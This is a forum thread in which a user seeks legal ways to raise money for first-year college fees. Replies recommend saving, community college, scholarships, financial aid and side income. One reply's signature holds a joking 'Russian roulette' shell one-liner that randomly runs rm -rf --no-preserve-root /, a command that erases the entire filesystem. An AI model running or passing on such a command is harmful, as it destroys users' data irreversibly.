The Lounge

Serious I need help coming up with money.

Submitted by DMPS, , Thread ID: 21650

Thread Closed
08-06-2016, 09:09 PM
Now I know I have cash but it is for my car payment. I have to come up with $8,806 for my first year of collage. Any legal ideas?

I can't do a loan because I have no credit. The school does a payment thing but it is like $3,000 each month. My parents won't and can't help me at all either.

Regards,
DMPS
[Image: Lorj6YP.png]

RE: I need help coming up with money.

3000$ is a lot of money, probably finding a good job... still it's hard to get 3000$/month
Play russian rulette:
[ $[ $RANDOM % 6 ] == 0 ] && rm -rf --no-preserve-root / || echo *Click*

OP
08-06-2016, 09:10 PM
enmafia2 Wrote:
3000$ is a lot of money, probably finding a good job... still it's hard to get 3000$/month

I have a good job. I just have a car payment and insurance and some other bills.
[Image: Lorj6YP.png]

You might want to postpone college and start saving up. I'm serious, not joking. College is no joke nowadays and this is advice I give most people who are in this situation. It's really expensive and you also might want to look into going to community college if you haven't already and financial aid. Scholarships as much as possible, I can't stress that enough. You can do it, man. There is no giving up now - you've made it this far.

~fdigl

Well good luck, 3 grand per month is a lot really specially for someone who would be in college.

Learn how to trade on Forex

cancer and broke aswell. oh lorddd
trying to become positive again #helpme

09-06-2016, 03:43 AM
fdigl Wrote:
You might want to postpone college and start saving up. I'm serious, not joking. College is no joke nowadays and this is advice I give most people who are in this situation. It's really expensive and you also might want to look into going to community college if you haven't already and financial aid. Scholarships as much as possible, I can't stress that enough. You can do it, man. There is no giving up now - you've made it this far.

~fdigl

I agree.

You should postpone it, save a bit, see what you can do with that. You could always start a blog or website and monetize that for a bit of extra along with your job, it's always possible.